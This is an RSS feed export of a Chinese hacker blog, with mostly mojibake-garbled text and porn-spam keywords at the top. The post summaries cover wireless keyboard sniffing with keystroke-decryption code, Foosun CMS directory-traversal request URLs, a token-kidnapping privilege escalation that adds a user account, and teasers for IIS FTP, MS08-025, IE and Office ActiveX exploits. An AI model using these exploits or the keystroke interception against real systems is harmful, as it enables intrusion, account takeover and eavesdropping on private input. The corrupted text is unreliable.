??xml version="1.0" encoding="utf-8" standalone="yes"?>av在线女优影院,久久久久久久免费视频了,亚洲午夜精品久久久久久久久久久久http://www.aygfsteel.com/baicker/archive/2015/09/05/427125.html009009Sat, 05 Sep 2015 10:34:00 GMThttp://www.aygfsteel.com/baicker/archive/2015/09/05/427125.htmlhttp://www.aygfsteel.com/baicker/comments/427125.htmlhttp://www.aygfsteel.com/baicker/archive/2015/09/05/427125.html#Feedback2http://www.aygfsteel.com/baicker/comments/commentRss/427125.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/427125.html认证很简单,只需要在FF04的UUID中写?0字节的值ƈ校验通过Q就可以Ҏ环进行读写指令控制?
其实有个更简单的Q只要给Immediate Alertq个属性发?x01或?x02卛_启动“女性娱乐模式”,不需要Q何认证:
Q这个属性本来是用来可穿戴设备的扑֛功能的)
...

  阅读全文

009 2015-09-05 18:34 发表评论
]]>
Sniffing Proprietary 2.4GHz Signalshttp://www.aygfsteel.com/baicker/archive/2015/05/08/424624.html009009Fri, 08 May 2015 06:12:00 GMThttp://www.aygfsteel.com/baicker/archive/2015/05/08/424624.htmlhttp://www.aygfsteel.com/baicker/comments/424624.htmlhttp://www.aygfsteel.com/baicker/archive/2015/05/08/424624.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/424624.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/424624.html(U) Sniffing Proprietary 2.4GHz Signals

使用HackRF或者RTL-SDR加变频器Q那是极好的Q但是我最l需要把所有东襉K打包C个小I间里面?/p>

可参考另一个页面:Travis Goodspeed, 作者不仅嗅探了cM的键?Microsoft Comfort Desktop 5000), q演CZ怎么?span style="line-height: 25.6000003814697px;">用他的一个叫GoodFET的设备和python的脚?/span>goodfet.nrfQ?span style="line-height: 25.6000003814697px;">?/span>?nRF24L01+ 芯片嗅探 2.4GHz 的数?/span>.

GoodFET and nRF24L01+

Travis发现嗅探该设备存在多个难点,不仅现在需要指定频道(频率Q,而且q需要指定MAC地址。nRF芯片只提供发送到指定MAC地址的数据包。此外,nRF芯片不会发送MAC地址数据Q因Z已经指定?(?code style="box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">RX_ADDR_P[0-5]6个管道中的一?/code>)?/p>

Travis发现在指定MAC长度的时候,在手册中为SETUP_AWQ当讄?#8216;0’的时候被认ؓ是非法的Q?/span> 

'00' - Illegal 
'01' - 3 bytes
'10' - 4 bytes 
'11' – 5 bytes

但是实际讄MAC地址Z个字节,q且把MAC讄在preamble的位|?0x00AA or 0x0055, in binary 0000000010101010 or 0000000001010101), pƺ骗讑֤在数据部分首先提供完整的MAC地址l我们,请参考这碉堡了?a style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">文章学习具体l节?/p>

Microsoft USB Dongle


(U) Increasing Speed and Portability

    虽然现在我们可以使用GoodFETQ电脑加nRF24L01+来做嗅探试Q但是最l我们还是希望能够用一套便宜的嵌入式设备来实现此功能。我们可以用Travis的研I成果,使用在微控制?嵌入式CE序来实现所有功能?/p>

另外Q我们做了一些改q?Goodfet.nrf 告诉我们怎样扫描我们惌监听的设备:

  • 频率?2400MHz开?/li>
  • 讄数据速率?1Mbps 以及MAC?x00AAQ监?0U钟
  • 讄数据速率?nbsp;2Mbps 以及MAC?x00AAQ监?0U钟
  • 讄数据速率?nbsp;1Mbps 以及MAC?x0055Q监?0U钟
  • 讄数据速率?nbsp;2Mbps 以及MAC?x0055Q监?0U钟
  • 逐步增加频率|直到2528MHz再返回从2400MHz开始@?(128个频率?
  • 要找C个潜在的键盘讑֤Q我们需要至四个包Q以满阈值确保是个合法的数据包,防止误报?/li>

    q意味着扫描一个完整的频率范围需要大U?5分钟Q?and at least several keystrokes must be pressed while we're sniffing within the correct 10 second period. ) 在仔l学习了Travis的研IӞKeyKeriki 的项目,以及试了我的键盘,我们可以做一些改q:

  • 查阅 FCCQ键盘只需要用?2403 - 2480MHz的范_直接?28个频率减到?8个频?(节省40%)
  • 所有键盘?MbpsQ又减少一半时间?/li>
  • 在检查了很多键盘之后Q我发现所有的微Y键盘的MAC地址都是?xCD开始的Q因此我们的preamble永远?code style="line-height: 25.6000003814697px; box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">0xAA (10101010) Q?nbsp;after inspecting more keyboards, I found that all Microsoft keyboards begin with 0xCD as the MAC, which tells us that our preamble will always be 0xAA (10101010) 因ؓ0xAA后面永远跟的? (0xCD 二进?11001101)以保持比特位交替Q这样又加快了一倍的搜烦速度?/li>
  • 因ؓ我们知道MAC地址的第一?(0xCD), 我们也知道需要什么样的数据包, 我们只需要检查某个确认的数据包,p知道q是一个我们要扄键盘讑֤?/li>
  • 我们把每个频率扫描时间降低到500毫秒Q从而把整个扫描一轮的旉降低?0U?/li>

(U) Decrypting Keystrokes

    Thorsten Schröder ?Max Moser 设计了一个碉堡了的东?nbsp;KeyKeriki, 能够监听微Y键盘Q完全逆向了解密的q程q且做了个设备能够完全实现这些。然而,他们的设备需要两个无U电和一个高端微处理器,来捕获和解析?Mbps通信的键盘设备生的数据。Travis的项目虽然牛|但是需要一台电脑主机,而且对于我们U密执行dQ这套设备还是太大了Q因此我们改q了设计Q现在只需要一个廉hU电和一个微处理器,功耗低而且体积,不再需要电脑和其他无线电设备?/p>

    Thorsten ?Max 发现q个击键只是使用ECB模式单的?span style="line-height: 25.6000003814697px;">MAC地址异或加密 , 我们可以使用Travis的方法利用nRF24L01+来嗅探和获取MAC地址Q这U加密方法相当于只是把扑克牌切了一ơ?/span>

l过q一步调查发玎ͼ我们现在知道所有微软键盘的MAC地址都是?xCD开始的Q实际按键(下图色部分Q恰好与MAC地址W一个字节对齐,q就是说即我们不知道完整的MAC地址Q我们依然能够解密按键消息,因ؓq个寚w是不会变的,MAC地址开头一个字?xCD也是不变的?/p>

׃数据包加密部分的长度?1个字节,而MAC地址?个字节,CRC校验是每个字节做Q异或(加密前)Q你会发C些有意思的事情Q由于MAC地址被异或了两次Q我们能够在不需要知道完整MAC地址的情况下计算校验|q是因ؓMAC被异或两ơ,q当于什么都没做Q而第11个字节又是MAC地址的第一个字节,我们知道?xCD。根据这个特性我们可以进行一些其他的dQ比如更Ҏ键和CRC校验Q同样不需要知道MAC地址Q这会在我以后的项目做相关演示?/p>

 KeyKeriki 目中的一|CZ解密q程Q?/p>

http://samy.pl/keysweeper/decrypt.png

  • Device type 0x0A = keyboard, 0x08 = mouse
  • Packet type 0x78 = keystroke, 0x38 = idle (key is held down)
  • Model type 0x06 = keyboard? This is the same HID code for a keyboard
  • HID code 0x05 = letter 'b' (described in section 7 here)

KeySweeper的解密部分代?

// decrypt those keyboard packets! 
void decrypt(uint8_t* pkt)
{
    // our encryption key is the 5-byte MAC address and
    // starts 4 bytes in (4-byte header is unencrypted)
     for (int i = 4; i < 15; i++)
        pkt[i] ^= mac >> (((i - 4) % 5) * 8) & 0xFF;
}
原文Q?span style="font-family: monospace; font-size: medium; line-height: normal; white-space: pre-wrap;">KeySweeper

009 2015-05-08 14:12 发表评论
]]>
打算做个HackRFhttp://www.aygfsteel.com/baicker/archive/2014/03/31/411745.html009009Mon, 31 Mar 2014 09:52:00 GMThttp://www.aygfsteel.com/baicker/archive/2014/03/31/411745.htmlhttp://www.aygfsteel.com/baicker/comments/411745.htmlhttp://www.aygfsteel.com/baicker/archive/2014/03/31/411745.html#Feedback18http://www.aygfsteel.com/baicker/comments/commentRss/411745.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/411745.html国外官方?00元左右Q目前买不到Q国内有做的Q卖2800人民币,C赗只能自己做了,好几个芯片好贵啊Q都上百了?


  阅读全文

009 2014-03-31 17:52 发表评论
]]>
使用xgoldmon目调试监控本机通信http://www.aygfsteel.com/baicker/archive/2014/03/11/407353.html009009Tue, 11 Mar 2014 11:02:00 GMThttp://www.aygfsteel.com/baicker/archive/2014/03/11/407353.htmlhttp://www.aygfsteel.com/baicker/comments/407353.htmlhttp://www.aygfsteel.com/baicker/archive/2014/03/11/407353.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/407353.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/407353.html支持手机Q感觉可以把手机讄成MODEM模式支持AT命o的应该都可以Q?
- Samsung Galaxy S3 GT-I9300
- Samsung Galaxy Nexus GT-I9250 (has to be rooted!)
- Samsung Galaxy S2 GT-I9100
- Samsung Galaxy Note 2 GT-N7100
。。。。。?
  阅读全文

009 2014-03-11 19:02 发表评论
]]>
OsmocomBB目http://www.aygfsteel.com/baicker/archive/2013/11/13/406293.html009009Wed, 13 Nov 2013 08:27:00 GMThttp://www.aygfsteel.com/baicker/archive/2013/11/13/406293.htmlhttp://www.aygfsteel.com/baicker/comments/406293.htmlhttp://www.aygfsteel.com/baicker/archive/2013/11/13/406293.html#Feedback114http://www.aygfsteel.com/baicker/comments/commentRss/406293.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/406293.html之前看过好多大牛玩osmocomBB目Q改个手机,q电脑,然后~译一堆东西,到最后都是开个consoleQ满屏红U绿l的文字滚动Q看着很吊?
但都不说最l能q啥Q滚屏完了就没了Q大牛都太低调了Q最q有朋友也在搞这个,了解了一下,以下描述都是我最q查阅的大量鸟文资料及少量中文资料之后的理解Q如有误望指出?
OsmocomBB是国外一个开源项目,是GSM协议?Protocols stack)的开源实玎ͼ全称是Open source mobile communication Baseband.目的是要实现手机端从物理?layer1)到layer3的三层实现?
q里记录一下过E,以便备忘和其它有需要的童鞋走弯\?
........

  阅读全文

009 2013-11-13 16:27 发表评论
]]>
Raspberry Pi 增加TFT昄http://www.aygfsteel.com/baicker/archive/2012/12/18/392829.html009009Tue, 18 Dec 2012 07:21:00 GMThttp://www.aygfsteel.com/baicker/archive/2012/12/18/392829.htmlhttp://www.aygfsteel.com/baicker/comments/392829.htmlhttp://www.aygfsteel.com/baicker/archive/2012/12/18/392829.html#Feedback8http://www.aygfsteel.com/baicker/comments/commentRss/392829.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/392829.html Raspberry Pi是一Ƒ֟于Linuxpȝ的个人电脑,配备一?00MHz的处理器Q?56内存Q支持SD卡和EthernetQ拥有两个USB接口Q以?HDMI和RCA输出支持?
有消息称Q虽然Raspberry Pi看v来非常的q你——只有一张信用卡大小Q但是它能够q行像《雷之锤三Q竞技场》这L游戏和进?080p视频的播放。但是以q次接TFT屏试用结果看Q我觉得臛_SPI是纯属扯J8蛋,可能HDMI速度快点Q但是就以那~译内核的速度来看Qƈ不乐观?

... ...
  阅读全文

009 2012-12-18 15:21 发表评论
]]>
TVB-Gone U外~码ҎQ每ơ都重新推算一遍,q纪大了q是记录一下吧Q?/title><link>http://www.aygfsteel.com/baicker/archive/2012/10/23/390119.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 23 Oct 2012 09:38:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2012/10/23/390119.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/390119.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2012/10/23/390119.html#Feedback</comments><slash:comments>5</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/390119.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/390119.html</trackback:ping><description><![CDATA[     摘要: <br>每次都重新推一遍,q纪大了q是记录一下吧Q?a href="http://www.aygfsteel.com/baicker/archive/2011/07/30/355418.html">g版的TV-B-Gone</a>的压~编码蟩q此D往下看Q?<br> <br>N900上有个TVB-Gone的程序,但是E序的红外编码往往都是对应的国外的电视Q好多国产电视都不支持, <br>有时候需要遥控空调或者投׃cȝQ只能自己录入了Q大概看了一下,~码比较单(比硬仉个简单多了,毕竟不需要考虑E序I间的问题) <br>Q上ơ录q一ơ,q次又重搞一遍,q是记录一下,以备后用。) <br>。。?<br>  <a href='http://www.aygfsteel.com/baicker/archive/2012/10/23/390119.html'>阅读全文</a><img src ="http://www.aygfsteel.com/baicker/aggbug/390119.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2012-10-23 17:38 <a href="http://www.aygfsteel.com/baicker/archive/2012/10/23/390119.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Raspberry Pi 入手安装配置 Q有图有真相Q?/title><link>http://www.aygfsteel.com/baicker/archive/2012/08/10/385239.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 10 Aug 2012 08:21:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2012/08/10/385239.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/385239.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2012/08/10/385239.html#Feedback</comments><slash:comments>5</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/385239.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/385239.html</trackback:ping><description><![CDATA[     摘要: <br>托rock的福Q跟风|了个Raspberry PiQ(破手机照的,q可以吧 ^_^Q,安装配置如下Q?<br>  <a href='http://www.aygfsteel.com/baicker/archive/2012/08/10/385239.html'>阅读全文</a><img src ="http://www.aygfsteel.com/baicker/aggbug/385239.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2012-08-10 16:21 <a href="http://www.aygfsteel.com/baicker/archive/2012/08/10/385239.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>无线键盘监听Q更?LCD 1602Q?/title><link>http://www.aygfsteel.com/baicker/archive/2011/02/19/344640.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 18 Feb 2011 18:40:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2011/02/19/344640.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/344640.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2011/02/19/344640.html#Feedback</comments><slash:comments>15</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/344640.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/344640.html</trackback:ping><description><![CDATA[     摘要: <br> 一个国外的开源项目,通过截获无线键盘发出的信P来监听键盘按键操作,W一个版本支持监?7MHz的无UK盘,W二个版本支?.4G的无UK盘监听及注入功能Q爽?<br> <br> 以前玩过C51单片机,加上本n自学能力和手工焊接功底不错,磕l绊几个月下来,l于初步完成了这个小玩意?<br> <br> q次的芯片是ATMEL的MEGA64AQ比之前C51pd的又强大、复杂了不少Q制作过E中遇到非常多的问题Q在q里鄙视一下(强烈圎ͼ国内的知识共享精?<br> <br>………?<br> <br>  <a href='http://www.aygfsteel.com/baicker/archive/2011/02/19/344640.html'>阅读全文</a><img src ="http://www.aygfsteel.com/baicker/aggbug/344640.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2011-02-19 02:40 <a href="http://www.aygfsteel.com/baicker/archive/2011/02/19/344640.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>遭受 MSN D.o.Shttp://www.aygfsteel.com/baicker/archive/2010/06/14/323582.html009009Mon, 14 Jun 2010 14:45:00 GMThttp://www.aygfsteel.com/baicker/archive/2010/06/14/323582.htmlhttp://www.aygfsteel.com/baicker/comments/323582.htmlhttp://www.aygfsteel.com/baicker/archive/2010/06/14/323582.html#Feedback3http://www.aygfsteel.com/baicker/comments/commentRss/323582.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/323582.html


009 2010-06-14 22:45 发表评论
]]>
风讯所有版本多个目录相xz?/title><link>http://www.aygfsteel.com/baicker/archive/2009/11/11/302036.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Wed, 11 Nov 2009 15:43:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2009/11/11/302036.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/302036.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2009/11/11/302036.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/302036.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/302036.html</trackback:ping><description><![CDATA[目录更名Q新目录不能包含点)<br /> /User/FileManage.asp?Type=FolderReName&OldFileName=../../FS_Inc&NewFileName=009<br /> <br /> 目录览QCurrPath不能包含点)<br /> /Foosun500/User/CommPages/FolderImageList.asp?CurrPath=/userfiles/&ShowVirtualPath=&f_UserNumber=1210538AD00<br /> <img alt="" src="http://www.aygfsteel.com/images/blogjava_net/baicker/FooSun500.jpg" /><br /> <br /> 创徏目录xxxxQCurrPath不能包含点)<br /> /User/CommPages/FolderImageList.asp?CurrPath=/userfiles/xxxx&ShowVirtualPath=&f_UserNumber=1210538AD00 <img src ="http://www.aygfsteel.com/baicker/aggbug/302036.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2009-11-11 23:43 <a href="http://www.aygfsteel.com/baicker/archive/2009/11/11/302036.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用?/title><link>http://www.aygfsteel.com/baicker/archive/2009/09/20/295752.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Sun, 20 Sep 2009 07:09:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2009/09/20/295752.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/295752.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2009/09/20/295752.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/295752.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/295752.html</trackback:ping><description><![CDATA[     摘要: <br>l定4444端口QWindows 2000 CN + SP4 试通过Q需要能建目录的用户Q偏Ud址若不通用Q请自行修改?<br>#!/usr/bin/perl <br># IIS 5.0 FTP Server / Remote SYSTEM exploit <br>.................. <br> <br>  <a href='http://www.aygfsteel.com/baicker/archive/2009/09/20/295752.html'>阅读全文</a><img src ="http://www.aygfsteel.com/baicker/aggbug/295752.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2009-09-20 15:09 <a href="http://www.aygfsteel.com/baicker/archive/2009/09/20/295752.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>TRS Q文本检索系l)注入http://www.aygfsteel.com/baicker/archive/2009/09/10/294589.html009009Thu, 10 Sep 2009 07:12:00 GMThttp://www.aygfsteel.com/baicker/archive/2009/09/10/294589.htmlhttp://www.aygfsteel.com/baicker/comments/294589.htmlhttp://www.aygfsteel.com/baicker/archive/2009/09/10/294589.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/294589.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/294589.htmlTRS 是英文Text Retrieval SystemQ文本检索系l)的羃写,据说是全文检索、搜索引擎、内容管理及知识理核心技术和产品的统一Q入?008q度国家规划布局内重点Y件企业,做某些渗透经怼到?
......


  阅读全文

009 2009-09-10 15:12 发表评论
]]>
Overwrite $_FILE array in rfc1867 - Mime multipart/form-data File Upload http://www.aygfsteel.com/baicker/archive/2009/07/27/288547.html009009Mon, 27 Jul 2009 03:54:00 GMThttp://www.aygfsteel.com/baicker/archive/2009/07/27/288547.htmlhttp://www.aygfsteel.com/baicker/comments/288547.htmlhttp://www.aygfsteel.com/baicker/archive/2009/07/27/288547.html#Feedback4http://www.aygfsteel.com/baicker/comments/commentRss/288547.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/288547.html鸟文没太看明白,摸烦了一下,$_FILE数组元素解析的问题?
搭个php的环境,目录在C:\www下,根目录下有个upload.php代码如下
......

  阅读全文

009 2009-07-27 11:54 发表评论
]]>
黑客控制整栋大厦电力pȝ,改编成游?http://www.aygfsteel.com/baicker/archive/2009/02/06/253651.html009009Fri, 06 Feb 2009 15:57:00 GMThttp://www.aygfsteel.com/baicker/archive/2009/02/06/253651.htmlhttp://www.aygfsteel.com/baicker/comments/253651.htmlhttp://www.aygfsteel.com/baicker/archive/2009/02/06/253651.html#Feedback6http://www.aygfsteel.com/baicker/comments/commentRss/253651.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/253651.htmlq才是牛逼黑?控制整栋大厦电力pȝ,大厦灯光来做背景,改编成游?坦克大战~~
.............

  阅读全文

009 2009-02-06 23:57 发表评论
]]>
以色列h发现的IE 0day (ZT)http://www.aygfsteel.com/baicker/archive/2009/01/08/250528.html009009Thu, 08 Jan 2009 11:16:00 GMThttp://www.aygfsteel.com/baicker/archive/2009/01/08/250528.htmlhttp://www.aygfsteel.com/baicker/comments/250528.htmlhttp://www.aygfsteel.com/baicker/archive/2009/01/08/250528.html#Feedback8http://www.aygfsteel.com/baicker/comments/commentRss/250528.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/250528.html试成功Q点打印后,会弹器
.........
  阅读全文

009 2009-01-08 19:16 发表评论
]]>
Token Kidnapping Windows 2003 PoC exploit (Win2K3试成功)http://www.aygfsteel.com/baicker/archive/2008/10/09/233300.html009009Thu, 09 Oct 2008 02:52:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/10/09/233300.htmlhttp://www.aygfsteel.com/baicker/comments/233300.htmlhttp://www.aygfsteel.com/baicker/archive/2008/10/09/233300.html#Feedback13http://www.aygfsteel.com/baicker/comments/commentRss/233300.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/233300.html我的有啥补丁打啥补丁的Win2k3 CN SP1试成功

d:\Churrasco.exe "net user 009 /add"

/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......

  阅读全文

009 2008-10-09 10:52 发表评论
]]>
WordPress暴绝对\?/title><link>http://www.aygfsteel.com/baicker/archive/2008/08/12/221492.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 12 Aug 2008 06:46:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2008/08/12/221492.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/221492.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2008/08/12/221492.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/221492.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/221492.html</trackback:ping><description><![CDATA[     摘要: <br>(之前发的"关于Fs2You怎么才能不被和谐"的文章被和谐掉了) <br>装WordPressZ看到?<br>默认plugins目录有hello.php文gQ不q好像很多插........ <br> <br>  <a href='http://www.aygfsteel.com/baicker/archive/2008/08/12/221492.html'>阅读全文</a><img src ="http://www.aygfsteel.com/baicker/aggbug/221492.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2008-08-12 14:46 <a href="http://www.aygfsteel.com/baicker/archive/2008/08/12/221492.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title> Microsoft Office Snapshot Viewer ActiveX Exploit (可执行版)http://www.aygfsteel.com/baicker/archive/2008/07/14/214835.html009009Mon, 14 Jul 2008 15:07:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/07/14/214835.htmlhttp://www.aygfsteel.com/baicker/comments/214835.htmlhttp://www.aygfsteel.com/baicker/archive/2008/07/14/214835.html#Feedback3http://www.aygfsteel.com/baicker/comments/commentRss/214835.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/214835.htmllcxl的Q网上的都是攑֐动项Q这个可以自动执?

<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
.........
  阅读全文

009 2008-07-14 23:07 发表评论
]]>
flash 9,0,115,0 exp (ZT)http://www.aygfsteel.com/baicker/archive/2008/05/30/204049.html009009Fri, 30 May 2008 03:26:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/05/30/204049.htmlhttp://www.aygfsteel.com/baicker/comments/204049.htmlhttp://www.aygfsteel.com/baicker/archive/2008/05/30/204049.html#Feedback1http://www.aygfsteel.com/baicker/comments/commentRss/204049.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/204049.html
  阅读全文

009 2008-05-30 11:26 发表评论
]]>
MS08-025 for win2k & win2k3http://www.aygfsteel.com/baicker/archive/2008/04/17/193889.html009009Thu, 17 Apr 2008 15:43:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/04/17/193889.htmlhttp://www.aygfsteel.com/baicker/comments/193889.htmlhttp://www.aygfsteel.com/baicker/archive/2008/04/17/193889.html#Feedback7http://www.aygfsteel.com/baicker/comments/commentRss/193889.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/193889.htmlD:\>ms08025 whoami

MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1

Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo  阅读全文

009 2008-04-17 23:43 发表评论
]]>
Firefox自定义referer插gQFirefoxH破防盗链)http://www.aygfsteel.com/baicker/archive/2008/04/08/191485.html009009Tue, 08 Apr 2008 06:42:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/04/08/191485.htmlhttp://www.aygfsteel.com/baicker/comments/191485.htmlhttp://www.aygfsteel.com/baicker/archive/2008/04/08/191485.html#Feedback1http://www.aygfsteel.com/baicker/comments/commentRss/191485.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/191485.htmlRefControl 0.8.10

要是上次扑ֈq个插g好了,省得我一遍一遍地用nc修改referer提交
很多防盗铑֒防本地提交是依靠用户览器自动提?......

  阅读全文

009 2008-04-08 14:42 发表评论
]]>
FirefoxH破囄防盗?/title><link>http://www.aygfsteel.com/baicker/archive/2008/04/08/191474.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 08 Apr 2008 06:00:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2008/04/08/191474.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/191474.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2008/04/08/191474.html#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/191474.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/191474.html</trackback:ping><description><![CDATA[     摘要: 以下Ҏ修改完后Q再h本页p看到上面囄 <br>FirefoxQ输入about:configq入配置面Q修改network.http.sendRefererHeader的gؓ1卛_Q默认是2Q, <br>..... <br>  <a href='http://www.aygfsteel.com/baicker/archive/2008/04/08/191474.html'>阅读全文</a><img src ="http://www.aygfsteel.com/baicker/aggbug/191474.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2008-04-08 14:00 <a href="http://www.aygfsteel.com/baicker/archive/2008/04/08/191474.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Real Player rmoc3260.dll Exp (老Cl的Q据说好?http://www.aygfsteel.com/baicker/archive/2008/04/02/190490.html009009Wed, 02 Apr 2008 15:56:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/04/02/190490.htmlhttp://www.aygfsteel.com/baicker/comments/190490.htmlhttp://www.aygfsteel.com/baicker/archive/2008/04/02/190490.html#Feedback5http://www.aygfsteel.com/baicker/comments/commentRss/190490.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/190490.htmlmilw0rm上的Q生成器
lcxl的Q稍微改了改代码Q据说好?
未测试,最q忙到自杀的时间都没有
唉,可惜有马时候没z,有洞时候没马,要不找个站挂上了?

http://www.aygfsteel.com/Files/baicker/Real........
  阅读全文

009 2008-04-02 23:56 发表评论
]]>
单认识Anti-RootKit(ZT)http://www.aygfsteel.com/baicker/archive/2007/12/29/171547.html009009Sat, 29 Dec 2007 07:09:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/29/171547.htmlhttp://www.aygfsteel.com/baicker/comments/171547.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/29/171547.html#Feedback1http://www.aygfsteel.com/baicker/comments/commentRss/171547.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171547.html..........
  阅读全文

009 2007-12-29 15:09 发表评论
]]>
